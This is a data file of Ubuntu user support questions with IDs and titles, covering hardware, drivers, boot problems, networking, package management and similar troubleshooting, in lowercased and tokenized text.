511432	the 'resume after suspend ' problem	i recently moved back to ubuntu . and it has seriously improved . everything is so smooth and fast . except , i have this issue , like so many others , i cant wake up after suspend while on battery . with my charger plugged in , i can close and open the lid all day long . no sweat . but battery powered ? it 's going down , black screen of doom every time . so i tried changing drivers . i removed the ones ubuntu came with . and that made things worse . i heard it works for a lot of guys , bur not me . i think i did it right . i ended up in low graphics mode and could n't get out of it . so i had to re-install , lose all my data , install ubuntu again , and try driver thing again . same thing . low graphics mode . no way out . re-install . live with the bug . if there are any suggestions out there , i 'd love to hear 'em . i tried to output the system error that comes after each restart , but it did n't work . my computer is a asus u36s sporting a nvidia 610m . com.ubuntu.apport.apport-gtk-root says : /usr/share/apport/apportcheckresume kerneloops
511434	touchpad failure after upgrading ubuntu	i have just bought an hp laptop pre-loaded with ubuntu . i was expecting it to be 14.04 but it was not and this was available as a downloadable upgrade . suffice to say the upgrade crashed my touchpad and it no longer works . i have tried several terminal based patches but this does not work either . i can not log in to the root system to enable permissions for editing the grub file and now the i can not type in the password for the system in the terminal either . has anyone got a reliable and simple patch that will get the touchpad working again ?
511435	freemind does n't get started in ubuntu 14.04 32-bit	i have just upgraded to ubuntu 13.10 from 13.04 . after completion of the upgrade i installed freemind , but it did n't get started even though the installation was complete without any error . i hope somebody has an answer to my question . running freemind from the terminal shows the following message : $ freemind checking java version ... java.io.filenotfoundexception : /home/neo/.freemind/auto.properties ( no such file or directory ) at java.io.fileinputstream.open ( native method ) at java.io.fileinputstream. < init > ( fileinputstream.java:146 ) at freemind.main.freemindstarter.readuserspreferences ( freemindstarter.java:136 ) at freemind.main.freemindstarter.main ( freemindstarter.java:56 ) panic ! error while loading default properties . update : i have already upgraded to ubuntu 14.04 , but even after reinstalling , freemind does not work . the above terminal window message is after upgrading to ubuntu 14.04 .
511438	what are all of the command line options for google chrome ?	i use google chrome as my main browser , and i wanted to know what things i can do with it from command line - especially commands that you ca n't do with the gui .
511440	nvidia optimus : how to disable onboard intel gpu so that nvidia drivers work - other than in bios	background : i have an acer aspire v3-571g laptop which has an nvidia geforce 710m gpu with `` optimus '' technology ( meaning it is capable of automatically switching between the onboard intel gpu and the nvidia gpu , in order to optimize battery life ) recently i installed nvidia 's proprietary drivers on ubuntu ( previously i was using nouveau , until i realized that was only using the builtin intel gpu and wasting the potential of the nvidia gpu ) . starting from then , i 've incurred in this bug : https : //bugs.launchpad.net/ubuntu/+source/xorg-server/+bug/1353620 that is , the system randomly freezes ( i.e . stops responding ) from time to time , unless i connect an external monitor , in which case everything works fine . according to an nvidia technician that replied to a customer care ticket i opened , this is due to a complete lack of support of nvidia 's linux drivers for optimus technology . ( yes , a technology they created ) . according him , disabling the onboard intel gpu , which is `` usually '' done via the bios ( `` usually '' is what he said ) , may fix the issue , avoiding the automatic switching between the two gpu 's . question : since there 's no way in my computer 's bios settings to disable optimus or the onboard gpu so that only the nvidia card is enabled , does anybody know of any way to accomplish that other than the bios ? p.s . please refrain from suggesting bumblebee , that would be ot . i 'll investigate that , but my question here is if there is a way to disable the onboard intel gpu if such an option is not available in the bios .
511441	two linux kernels show up in refind	refind gives me the options to boot 3.13.0-32-generic and 3.13.0-34-generic . is it possible/practical to either uninstall the old one , or prevent it from showing up in the bootloader . thank you for your help ! /u/rossistboss
511443	`term` environment variable not exported from `.profile` ?	i have this in my .profile ( i 'm running ubuntu 12.04 ) : export term= '' xterm-256color '' the variable seems not exported or be invariably later overwritten as term= '' xterm '' . a test with gnomeâżterminal : $ gnome-terminal -- command=sh $ echo $ term > xterm $ gnome-terminal -- command=bash $ echo $ term > xterm $ gnome-terminal -- command=zsh $ echo $ term > xterm at least , this is not due to the shell . is this due to gnome-terminal ? another test with xterm : $ xterm sh $ echo $ term > xterm $ xterm bash $ echo $ term > xterm $ xterm zsh $ echo $ term > xterm at least , this is not specifically due to gnomeâżterminal , as it 's the same with xterm . i have to add the export term= '' xterm-256color '' in the shell 's profiles . i had a similar issue with exporting ld_library_path from .profile , which was always overwritten ( i do n't remember how i solved it ) . what overwrites/prevents exporting of the term environment variable from .profile , and why ? notes ( update ) after muru 's comment , i tried this : gnome-terminal -- command= '' [ sh/bash/zsh ] -l '' and xterm -ls [ sh/bash/zsh ] ( by [ sh/bash/zsh ] i mean replace in turn by each ) , to get a login shell ( but it did not ask for a password , funny ) , and the result differs : i get term= '' xterm-256color '' with sh and bash , but not with zsh , with which i always get term= '' xterm '' .
511444	astro a40 wont work with lubuntu	i have a pair of astro a40s with mixamp pro . my laptop has lubuntu . i switched my sound processing program to alsa , and it recognizes mixamp . the problem is that it does not push sound through . it 's connected through usb , and it works on every other computer .
511454	adobe acrobat reader 9 . no read out loud function	i need help in activating the read out loud function in acrobat reader 9 . i have ubuntu 14.04.1 64 bit edition and i installed the missing 32 bit libraries but nothing works and the reading tab in preferences is grey in what regards the read out loud options , i see no drivers etc . what can i do to have the read out loud options activated for linux . i read the answers to questions similar to mine but nothing helps thanks . edit : i have installed the libgnome-speech7 package but when i go to /var/lib/dpkg/info/acroread.postinst configure is see no file named acroread.postinst
511455	why am i getting the error `` can not assign to non-existent property `` head '' ?	i 'm actually on trusty , and i want to try new `` head '' property which comes with api 14.10 of ubuntu sdk . when i launch qmlscene to test my applicaton , i get this error : can not assign to non-existent property `` head '' i imported this on my qml file : import qtquick 2.2 import ubuntu.components 1.1 thanks for your help . edit : example of code import ubuntu.components 1.1 import qtquick 2.2 mainview { width : units.gu ( 50 ) height : units.gu ( 80 ) usedeprecatedtoolbar : false page { id : page title : `` sections '' head { sections { model : [ `` one '' , `` two '' , `` three '' ] } } label { anchors.centerin : parent text : `` section `` + page.head.sections.selectedindex } } }
511456	ubuntu ssd /dev/sda and lvm partition alignment	i got a ssd new harddrive and successfully moved my root partition to it . i am using lvm . it is booting fast , and all the performance is much better than with classic hdd . but i am not sure about the partition alignment . there is another thread here on askubuntu helping to determine , if the partitions are aligned properly using parted . issuing the commands i get following results : sudo parted /dev/sda ( my ssd hdd ) p number start end size type file system flags 1 32,3kb 502mb 502mb primary ext4 boot 2 502mb 54,5gb 54,0gb primary lvm align-check opt partition 1 not aligned partition 2 not aligned however when issuing commands sudo parted /dev/ssd/root_ssd ( my root logical volume ) partition 1 aligned the `` ssd '' volume group is the one i created for my ssd harddrive only , so it exists directly above /dev/sda . i am confused about the `` not aligned '' output from /dev/sda , because i guess it `` should '' be aligned in order to work properly , because it is a physical drive where the lvm is on . but on the other hand , the logical volume itself reports `` aligned '' . which of those two informations is more correct ? if /dev/sda is `` not aligned '' , can i somehow get it aligned without reinstall ? am i missing something ? thanks alot !
511457	touch pad scroll not working properly	i have dell inspiron-5520 laptop with ubuntu 14.04.i have enabled natural scrolling but this is not working properly . the problems are : the scrolling area has been reduced very much . the scroll is going reverse i.e . when i scroll down the page goes up and vice versa . these problems were not occurring when i previously installed ubuntu 14.04 .
511459	dual boot ubuntu 12.04 / xp - resized partitions , xp starts to load but fails to boot	on a compaq mini 100 i had ubuntu 12.04 and xp dual booting just fine . there was an ntfs partition between the windows partition and the ubuntu partition . i shrank the xp partition and enlarged the ntfs partition . now ubuntu boots fine but when i try to boot xp i get the splash screen for a few seconds , then the computer reboots . safe mode does the same ( prints several dozen text lines , then reboots ) . i ran boot-repair but nothing changed . results are here : http : //paste.ubuntu.com/8048155/ what did i do to xp , and how can i fix it ? i do not want to risk my ubuntu install , i will give up on xp rather than do something risky to ubuntu . many thanks for any suggestions .
511460	ubuntu one storage - is there any chance to recover at all ?	my hard drive broke . i had some backup on ubuntu one , but now it is closed . the link `` contact ubuntu one shutdown support '' does not work . how can i get in touch with people who were in charge of file services to check if i can still recover anything ? thanks .
511461	run command for every file in directory	i 'm converting all of my video files to webm , to greatly reduce the amount of hard disk space being used . to do this i use the program `` ffmpeg '' which requires an input and output file specified . since the converting process takes a long time , i wish to run it day and night for every video file in my video folder , so i do n't have to manually do it myself . by googling myself i found ways to do this but the output would be 1 big file . can anybody explain me how i convert `` video1.avi '' to `` video1.webm '' , and `` video2.avi '' to `` video2.webm '' , etc etc automatically ?
511462	use capslock/fnlock led as hdd led	my samsung np370r4v notebook does n't come with a built-in hdd indicator led . my fn-lock or caps-lock leds are pretty much unused ( i do n't really need them ) . is there any way to make either of them to work as a hdd led indicator ?
511463	can i convert ubuntu desktop 14.04 to server ?	i 've found several solutions to convert ubuntu 12.04 desktop to server , with the following commands : sudo apt-get install tasksel sudo tasksel remove ubuntu-desktop sudo tasksel install server apt-get install linux-server linux-image-server apt-get âpurge remove lightdm i just want to know if it is the same process with ubuntu 14.04 . the reason i need to do this is because i need to install moodle and it requires to run over ubuntu server rather than desktop . thanks
511465	are there multiple lts distributions available ?	my distributed network consists of atleast 10 servers , all of which are running ubuntu 12.04 lts . this was a design decision , so that we would have a more consistent back-end , as far as the operating system was concerned.. this is also so that we can more easily plan our maintenance workload , with anticipation of the distribution release cycle . however , i have noticed that on one of our development machines , that which runs ubuntu 12.04 lts desktop distribution , that there was recently a hardware stack upgrade . we installed this to our machines within the distributed network , instead of upgrading to the latest version of ubuntu . the idea being that we have the latest candidates for hardware and kernel support , while still running the long term service distribution which is currently available . i logged on the other day , to find out that ubuntu 14.04 lts has been released . my question ( s ) is this : how does this effect the software/kernel/os update , patch , and development cycle of ubuntu 12.04 lts ? is ubutnu 12.04 still in service until 2017 , such as it was that last time i checked ? is there any reason to upgrade our machines to 14.04 lts , or should be just wait until 12.04 lts is no longer supported ? thanks for your time , to whom ever answered this for me !
511466	which applications should i open with bumblebee ?	having a nvidia-optimus laptop , i have , on recommendation , installed the bumblebee optimization . though i am unclear about when to actively use it . there seems to be a a gui called bumblebee gui where you can configure what should be run through bumblebee . but what applications or what kind of applications should i open with bumblebee ?
511467	how can i completely erase all data on a micro sd card ?	i just got a micro sd card that i plan on using with the raspberry pi . i used the kde partition manager to delete the original partition on the card and to write a new 12gib ext4 partition . after doing this , the card still says that 6 % of it , 30.02 mib , is being used . basically , i want to completely wipe of the card of all contents so as to prepare it for a new os . would a command like shred or dd do the trick or would that destroy the partition as well ?
511469	i have some questions about firewall	so i am pretty new to linux ( with the exception of android ) , and being use to the old ways of windows pretty much all i had to do for firewall was turn it on and forget about it . however with ubuntu linux i see it is a bit more complicated than that . i am as of currently using gufw for firewall , it is set to allow outgoing and to deny ingoing . i was just wondering if this might affect any of my programs ie . skype ... etc . from working properly ? i am really new to all this and would love to learn more . help is appreciated . i know you can set rules and what not , but i do n't want to set rules for programs if it is not necessary . just really confused ... .
511473	ubuntu cant connect to wireless cisco e1200 ( atheros ar5bwb222 )	i have a problem , my ubuntu installation keeps trying to connect to my home wireless ( cisco e1200 ) it keeps trying but never connects . i test the connection with same computer but booting with windows and it works perfectly , also i 'm connected with my cellphone too . so i have to go and restart the router and it works , then if for a reason i restart ubuntu the problem come 's back so i cant connect and i have to reboot the router every time i disconnect from wireless . it 's weird since i have no problem with windows , also others in the house ( windows too ) have no problems to connect . any idea ? thanks in advance .
511474	dir_mode has no effect on domain-joined user profiles in /home	in /etc/adduser.conf i edited it to be dir_mode=0750 so all home directories are not world readable . however , this only seems to effect local users in the /home directory . i have since joined my computer to a windows domain and when i log in using a domain user it creates home folders in /home along with all the local users . the dir_mode=0750 does not seem to apply to these folders that are created on the fly as domain users log in . any ideas how to get dir_mode in adduser.conf to apply to domain user 's home folders ?
511478	slow wifi connection in ubuntu 14.04 installed in hp pavilion	my ubuntu 14.04 os wifi connection is is very slow ? my laptop is hp pavalion , and i am dualbooting with windows . what steps should i take to diagnose this problem ?
511482	dăšjă dup backup restore failure	i tried to restore a deja dup backup and it fails , i get an unknown error that has a trace back that is below . if there is anyway to just open the backup folders that would be enough for me to at least manually transfer what i need any help would be greatly appreciated . traceback ( most recent call last ) : file `` /usr/bin/duplicity '' , line 1494 , in < module > with_tempdir ( main ) file `` /usr/bin/duplicity '' , line 1488 , in with_tempdir fn ( ) file `` /usr/bin/duplicity '' , line 1337 , in main do_backup ( action ) file `` /usr/bin/duplicity '' , line 1370 , in do_backup globals.archive_dir ) .set_values ( ) file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 697 , in set_values self.get_backup_chains ( partials + backend_filename_list ) file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 819 , in get_backup_chains map ( add_to_sets , filename_list ) file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 809 , in add_to_sets if set.add_filename ( filename ) : file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 96 , in add_filename self.set_manifest ( filename ) file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 127 , in set_manifest remote_filename ) assertionerror : ( 'duplicity-full.20130313t005245z.manifest.gpg ' , 'duplicity-full.20130313t005245z.manifest ' )
511486	dropbox does not sync on ubuntu 14.04	for mysterious reasons dropbox is not working anymore . i have added few small pdf to my folder and it is syncing them for hours . i have tried to remove and reinstall dropbox but nothing is changed . i suspect this can be due a possible recent ubuntu update . has anyone the same problem or now how to solve it ?
511487	logitech dinovo edge usb bluetooth keyboard quit working after 12.04lts to 14.04lts upgrade	i noticed this after upgrading my desktop ( commodity pc parts ) from 12.04lts to 14.04 lts . upgrade done with updater after bieng notified yesterday that there was a new release available . i 've been poking at it for some hours on several computers . 2 have the problem and one seems fine . starting with this desktop the logs show a difference between versions on the same machine in the syslog bluetooth startup . the bluetooth device is a logitech edge keyboard with a usb bluetooth 2.0 adapter . 12.04lts ( working ) : aug 12 21:27:26 ceora bluetoothd [ 1058 ] : bluetooth daemon 4.98 aug 12 21:27:26 ceora bluetoothd [ 1058 ] : starting sdp server aug 12 21:27:26 ceora bluetoothd [ 1058 ] : failed to init alert plugin aug 12 21:27:26 ceora bluetoothd [ 1058 ] : failed to init time plugin aug 12 21:27:26 ceora bluetoothd [ 1058 ] : failed to init proximity plugin aug 12 21:27:26 ceora bluetoothd [ 1058 ] : failed to init gatt_example plugin aug 12 21:27:26 ceora bluetoothd [ 1058 ] : listening for hci events on hci0 aug 12 21:27:26 ceora bluetoothd [ 1058 ] : hci dev 0 up aug 12 21:27:27 ceora bluetoothd [ 1058 ] : adapter /org/bluez/1058/hci0 has been enabled aug 12 21:27:53 ceora bluetoothd [ 1058 ] : endpoint registered : sender=:1.39 path=/mediaendpoint/hfpag aug 12 21:27:53 ceora bluetoothd [ 1058 ] : endpoint registered : sender=:1.39 path=/mediaendpoint/a2dpsource aug 12 21:27:53 ceora bluetoothd [ 1058 ] : endpoint registered : sender=:1.39 path=/mediaendpoint/a2dpsink aug 12 21:28:19 ceora bluetoothd [ 1058 ] : endpoint registered : sender=:1.53 path=/mediaendpoint/hfpag aug 12 21:28:19 ceora bluetoothd [ 1058 ] : endpoint registered : sender=:1.53 path=/mediaendpoint/a2dpsource aug 12 21:28:19 ceora bluetoothd [ 1058 ] : endpoint registered : sender=:1.53 path=/mediaendpoint/a2dpsink aug 12 21:28:34 ceora bluetoothd [ 1058 ] : endpoint unregistered : sender=:1.39 path=/mediaendpoint/hfpag aug 12 21:28:34 ceora bluetoothd [ 1058 ] : endpoint unregistered : sender=:1.39 path=/mediaendpoint/a2dpsource aug 12 21:28:34 ceora bluetoothd [ 1058 ] : endpoint unregistered : sender=:1.39 path=/mediaendpoint/a2dpsink 14.04lts ( broken ) : aug 14 12:30:18 ceora bluetoothd [ 5360 ] : bluetooth daemon 4.101 aug 14 12:30:18 ceora bluetoothd [ 5360 ] : starting sdp server aug 14 12:30:18 ceora bluetoothd [ 5360 ] : dis can not start : gatt is disabled aug 14 12:30:18 ceora bluetoothd [ 5360 ] : failed to init deviceinfo plugin aug 14 12:30:18 ceora bluetoothd [ 5360 ] : failed to init proximity plugin aug 14 12:30:18 ceora bluetoothd [ 5360 ] : failed to init time plugin aug 14 12:30:18 ceora bluetoothd [ 5360 ] : failed to init alert plugin aug 14 12:30:18 ceora bluetoothd [ 5360 ] : failed to init thermometer plugin aug 14 12:30:18 ceora bluetoothd [ 5360 ] : failed to init gatt_example plugin aug 14 12:30:18 ceora bluetoothd [ 5360 ] : bluetooth management interface initialized for the computer that works with 14.04 ( a dell mini 910 ) : aug 14 12:32:12 dellmini bluetoothd [ 7378 ] : bluetooth daemon 4.101 aug 14 12:32:12 dellmini bluetoothd [ 7378 ] : starting sdp server aug 14 12:32:12 dellmini bluetoothd [ 7378 ] : dis can not start : gatt is disabled aug 14 12:32:12 dellmini bluetoothd [ 7378 ] : failed to init deviceinfo plugin aug 14 12:32:12 dellmini bluetoothd [ 7378 ] : failed to init proximity plugin aug 14 12:32:12 dellmini bluetoothd [ 7378 ] : failed to init time plugin aug 14 12:32:12 dellmini bluetoothd [ 7378 ] : failed to init alert plugin aug 14 12:32:12 dellmini bluetoothd [ 7378 ] : failed to init thermometer plugin aug 14 12:32:12 dellmini bluetoothd [ 7378 ] : failed to init gatt_example plugin aug 14 12:32:12 dellmini bluetoothd [ 7378 ] : bluetooth management interface initialized aug 14 12:32:12 dellmini bluetoothd [ 7378 ] : adapter /org/bluez/7378/hci0 has been enabled aug 14 12:32:12 dellmini bluetoothd [ 7378 ] : endpoint registered : sender=:1.67 path=/mediaendpoint/hfpag aug 14 12:32:12 dellmini bluetoothd [ 7378 ] : endpoint registered : sender=:1.67 path=/mediaendpoint/hfphs aug 14 12:32:12 dellmini bluetoothd [ 7378 ] : endpoint registered : sender=:1.67 path=/mediaendpoint/a2dpsource aug 14 12:32:12 dellmini bluetoothd [ 7378 ] : endpoint registered : sender=:1.67 path=/mediaendpoint/a2dpsink aug 14 12:32:12 dellmini bluetoothd [ 7378 ] : hci0 : load long term keys ( 0x0013 ) failed : not supported ( 0x0c ) note the line referring to adapter /org/bluez/1058/hci0 is present in the working configurations and missing in the broken . i also have an acer aspire one running 14.04 that has the same symptoms/logs as my broken desktop and the bluetooth is broken there , too . i did have the bluetooth keyboard working on the acer with either 13.04 or 13.10 , but i ca n't remember which . from the user interface the breakage shows itself in the system settings - > bluetooth as everything greyed out with no bluetooth adapters found in the adapter list . the check box to show bluetooth status in the menu bar will check , but nothing shows . i can post more info ... let me know . update 20140815 : i got it working as follows : insert the dongle while holding down the red button on it . open the system settings - > bluetooth utility . now the option to turn on bluetooth is not greyed out and bluetooth turns on . add the device and and pair it and it works !
511491	stuck on kernel 3.8	i have a digitalocean vps that is somehow stuck on kernel 3.8-generic , which is shown when i run uname -a . however , the only kernels in /boot are : my sources are such : deb mirror : //mirrors.ubuntu.com/mirrors.txt trusty main restricted universe multiverse deb mirror : //mirrors.ubuntu.com/mirrors.txt trusty-updates main restricted universe multiverse deb mirror : //mirrors.ubuntu.com/mirrors.txt trusty-backports main restricted universe multiverse deb mirror : //mirrors.ubuntu.com/mirrors.txt trusty-security main restricted universe multiverse byobu is saying that i am running the 14.04 release . i have already run sudo apt-get install linux-image-generic-lts-trusty linux-headers-generic-lts-trusty , which shows : linux-headers-generic-lts-trusty is already the newest version . linux-image-generic-lts-trusty is already the newest version . i have tried running sudo update-grub and sudo update-grub2 before rebooting , but this does not work . what do i need to do to restart into the 3.13 kernel ?
511492	i can not uninstall skype from the ubuntu software center	i tried opening ubuntu software center to uninstall skype , but it does n't list any software under the installed tab . it does n't list my firefox browser , skype , or anything else . what do i do now ?
511495	ninja-ide freezing periodically on ubuntu 12.04	i 'm using ninja-ide 2.3 on ubuntu 12.04 and it used to work like a charm until now . it freezes for a few seconds every 20 or 30 sec and it does not respond to what i type anymore . maybe it comes from an enabled setting that performs some checks on the whole document periodically or something of that kind , i have no idea . does anyone experienced the same issue and found out how to get back to a fluid user experience ? edit : i ran ninja with the log level set to debug and the problem seems to come from the fact that i am working on a django project . at some point i generate an improperlyconfigured exception because django_settings_module is not set properly . i think ninja runs some checks on the current document using python but it would be more correct to go through the python manage.py shell of the project in order to have django_settings_module set automatically . next question is : is there a way to specify to ninja that it should use python manage.py shell instead of the regular python shell ?
511496	problem : mouse/touchpad work under live environment but do not function once os is installed	i 've run into a very frustrating problem when trying to install xubuntu and lubuntu 14.04 on my laptop . while running the livecd both my usb mouse and the touchpad work perfectly , but once the os is installed and i reboot , everything goes to hell in a handbasket . namely : mouse and touchpad no longer work ( also tried rebooting/reinstalling without the usb mouse ) ctrl + f2 does n't drop to a terminal . it just gives me a black screen . this is not an asus ( or was it acer ? ) notebook and i 'm fairly confident that my problem is unrelated to that one ( as evidenced by the fact that i get no mouse movement at all ) . what can i do to diagnose and fix this problem ? additional information : this may or may not be relevant but i 've noticed that upon rebooting after a successful installation , the screen resolution drops to below native . perhaps there 's a video driver issue , but i fail to see how the two things could be related .
511497	what is exactly object file and how to open it	g++ mycppfile -o myout i do not know about compiling procedure . but all i want to know is what is the type of myout ? it is not text . it is not like configuration file . so what is it ? and how to see its content ?
511499	are there really security risk when running wine ?	i remember reading somewhere that since wine 's job is to pretty much emulate windows so that you can run windows programs , it puts a risk on your linux machine since windows viruses can also run within wine . now i know the chances of windows viruses running within wine are pretty much a 0.1 % of happening . however how much of a risk is this all to my computer ?
511501	xfce login sesion start	i am using xubuntu 14.04 . i wanted to try the kde desktop environment and installed it . i did n't like it so i uninstalled it . but after that when i log in into xubuntu sesion a get a blank screen and it shows like working . if i press ctrl+alt+f1 then ctrl+alt+f7 the desktop is displayed ok. why the xfce session does not start the way it should ? thanks .
511503	is it possibe to view a forgotten admin password ?	my ubuntu pc is setup to auto login , so since i never have to type my password , i 've forgotten it . now , normally i 'd just reset it , but i used that password for another online service , and i want to login on that service again but i do n't know the password . is there any way to see my password ? i 'm logged in the admin account , it auto logins . thanks ! jens
511506	faillog empty - should i be worried ?	on my machine of 4 years old , i have probably mistyped my password a zillion times . yet , nothing shows up in the faillog . doing faillog -a gives me a bunch of : username 0 0 01/01/70 01:00:00 +0100 every user is 0 . that ca n't be right . furthermore , when i look in /var/log/ , i can see the /var/log/faillog exists as a file of 32 kb , last changed on january 15 , 2014 ( that in itself is also weird ) . > ls -alhtr /var/log | grep faillog -rw-r -- r -- 1 root root 32k jan 15 2014 faillog then , lastly , trying to tail , cat or head this file , it shows nothing . > head /var/log/faillog > tail /var/log/faillog > cat /var/log/faillog should i be worried ? has my machine been compromised ? oh btw , i 'm currently runnin 14.04 , but this machine has gone from 10.04 to 12.04 to 12.10 , 13.04 , 13.10 and now 14.04 . in case that 's important .
511509	failed too download respository - ubuntu 12.10	none of the solutions have worked for me . i am new to linux and ubuntu but trying . this is some of what i get : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/main/binary-i386/packages 404 not found [ ip : 91.189.91.15 80 ] , , e : some index files failed to download . they have been ignored , or old ones used instead . what can i do ? thanks in advance .
511511	getting sound on windows 7 virtual box	i have windows 7 running in virtual box on ubuntu 14.04 but i cant get sound . how can i fix this ?
511513	complete deletion/reinstallation of downloaded package	i want to know how to delete every file installed by a package using either aptitude or apt-get and then re-download and re-install that package completely again . i 've tried doing aptitude reinstall apache2 apache2-doc after running aptitude purge apache2 apache2-doc but that doesnt work . what i did was i deleted my /etc/apache2 directory thinking i could just reinstall it ( i was having php integration issues ) but now whenever i try to install it i get the error `` invoke-rc.d initscript apache , action `` reload '' failed . '' any advice will be helpful .
511516	ubuntu 12.04 ( storage folders wo n't share )	i had ubuntu 12.04 installed , and it worked fine . once it started a `` new '' upgrade , i jumped on the 14.04 , and all hell blew up . i lost my 3tb folders and the system just divided into 5 folders of about 3-5gbs a piece . i need to put them back ( to 2tb , 1tb storage ) and use the rest for operating system 's space . how can i reinstall it like it was before ?
511517	make `` backups '' icon go away	shortly after installing ubuntu 14.04 , i started getting this annoying black-box icon on my application launcher . i have to click on it and say `` skip backups '' every time i restart my computer to make it go away . i never used backup software before ; i have my own methods . how can i make this go away ? is it a standalone program or part of the new os ?
511518	fstab wo n't mount smb/cifs share in ubuntu 14.04 ( after upgrade from 12.04 lts )	i have a nas network file server which under ubuntu 12.04lts i used to automatically mount using the following entry in my fstab file : //nas-a0-b9-af/public /opt/z cifs credentials=/home/user/.smbcredentials , uid=1000 , iocharset=utf8 0 0 i upgraded to 14.04 ( big mistake ) and the share does not mount ! nothing has changed on the server side . although i can manually mount the partition by the following command , i no longer have read write access sudo mount 192.168.1.103 : /c/public /opt/z i hope someone can help me ; this is causing me a great deal of stress and lot of wasted time . just one thing : during the upgrade process i opted for my samba configuration to be left as it was under 12.04lts .
511519	lenovo ideapad n580 - screen always shaking/flickering	the screen flickering all began a few weeks after installing ubuntu 13.10 , and ( unrelated to this specific problem ) the laptop would n't upgrade to 14.04 through the usual way . recently , though , i decided to try installing ubuntu 14.04 by first downloading the iso and setting it up on a flash drive . the installation went well and i was very glad to see that the shaking/flickering of the screen had gone away . now , though , just 3 days after the fresh installation , the flickering has returned . i 'm assuming that it is a driver issue or ubuntu bug , considering that it was temporarily fixed with a fresh install . what could be causing this issue ? how can i fix it ? i 'm having a very difficult time researching for drivers that might correct this . lenovo ideapad n580 intel pentium b690 intel sandy bridge graphics ( drivers needed ? ) 64-bit ubuntu ( replaced 64-bit windows 8 ) i 've found some old posts about sandy bridge compatibility issues with previous versions of ubuntu in the past couple of years , but nothing specific to screen shaking/flickering . check it out and let me know if it 's easy to fix : the entire screen does this , but i zoomed into a corner to make it easier to see . sometimes , it shakes up and down more rapidly , making it very difficult to use the laptop . the shaking usually slows down after a couple of hours of continued use , but goes rapid again after the screen goes to sleep and is woken up .
511521	everything resets after reboot in 14.04	i just installed 14.04 and after i reboot , all my settings revert as well as all installed apps go missing . it 's as if i 'm booting in for the first time every reboot .
511523	how to change the locale in wine for all programs ?	http : //timcampyy.tumblr.com/post/90771619172/emofuri-problem-solved , this is what i am trying to solve ; it involves me changing the locale to japanese , then reinstalling , which is why i need it to affect wine itself . any suggestions ?
511524	how to save windows license before installing ubuntu	i purchased a new lenovo thinkpad l540 laptop . this laptop was supposed to be installed with windows 8 pro but instead it came with windows 7 pro with an option to upgrade to windows 8 pro . now they provided me four discs with following titles : operating system recovery disc windows 8 pro disc 1 operating system recovery disc windows 8 pro disc 2 windows 8 recovery media for windows 8 products disc 1 windows 8 recovery media for windows 8 products disc 2 now i want to install ubuntu 14.04 on this laptop . also i want to backup my license of windows 7 so in case if in future if i need i 'll install windows 7 and not win 8 . i do n't like windows 8 , i do n't like win 7 either but if i have to choose between them i 'll choose 7 . another problem i am facing is when i tried to shrink my 500gb windows partition i am not able to shrink it below 228 gb . i want to shrink it to 100gb so that i can use remaining 128 gb as my home partition . i followed [ this ] [ 1 ] tutorial to shrink partition , but no luck . so i think i may have to remove windows 7 and reinstall it using the backup i am creating above . so can anyone please help me in telling me how can i create backup of windows 7 before i start messing up by installing ubuntu . i am in no rush , i want to know exactly what i am getting into , so i 'll do as much reading as required . so pointing me in right direction will also help . thanks .
511525	how to install a .bin file in silent mode ?	i am learning to use saltstack for deploying softwares over several hosts . i need to install a .bin file on a remote host . however , during the installation there are several interactions . are there any ways to finish the configuration before installation , such as using debconf for .deb installation ?
511527	battery died while in standby , now why wo n't ubuntu 14 boot ?	my netbook battery died while in standby , and now it will not boot - running ubuntu 14.04 . when i boot recovery , it stops after this seemingly relevant information : mount : mounting /dev/mapper/ubuntu -- vg-root on /root failed : invalid argument begin : running /scripts/local-bottom ... done . done . begin : running /scripts/init-bottom ... mount : mounting /dev on /root/dev failed : no such file or directory done . mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing inti = bootarg . what could have caused this and how do i fix it without losing data ? did i simply blast my partition table ? thanks in advance !
511535	a real beginner , neflix and beyond	my daughter and i have a little acer netbook , and use it for all our home schooling needs , from online research , email , writing papers , etc , to down time use watching neflix , youtube and fb . can i use ubuntu on this mini laptop and still do all the things we are used to doing ? i 'm nearly a complete computer idiot , so talking os , dos ( how i originally learned computer , but forgotten , over 25 yrs ago ) , gigabytes , pixels and platforms is gibberish to me ... my eyes glaze over and i just nod dumbly and walk away with no understanding at all . so ! keep it kindergarten for me .
511537	command is available as user , but not sudo ?	i am in the process of building gendev , a sega genesis development environment and i am running into an interesting problem . when i try to install via `` sudo make install '' i get an error stating that a program named `` rescomp '' is not found , see below : make [ 1 ] : entering directory `/home/bubo/genesis-dev/gendev-read-only/sgdk/sgdk-read-only' rescomp res/libres.res res/libres.s make [ 1 ] : rescomp : command not found make [ 1 ] : *** [ res/libres.s ] error 127 make [ 1 ] : leaving directory `/home/bubo/genesis-dev/gendev-read-only/sgdk/sgdk-read-only' make : *** [ sgdk-read-only/libmd.a ] error 2 however , if i return to being a normal user ( not root ) i can execute the rescomp program without issues . is this a problem with environment variables ? how can i enable the root account to use `` rescomp '' as well ?
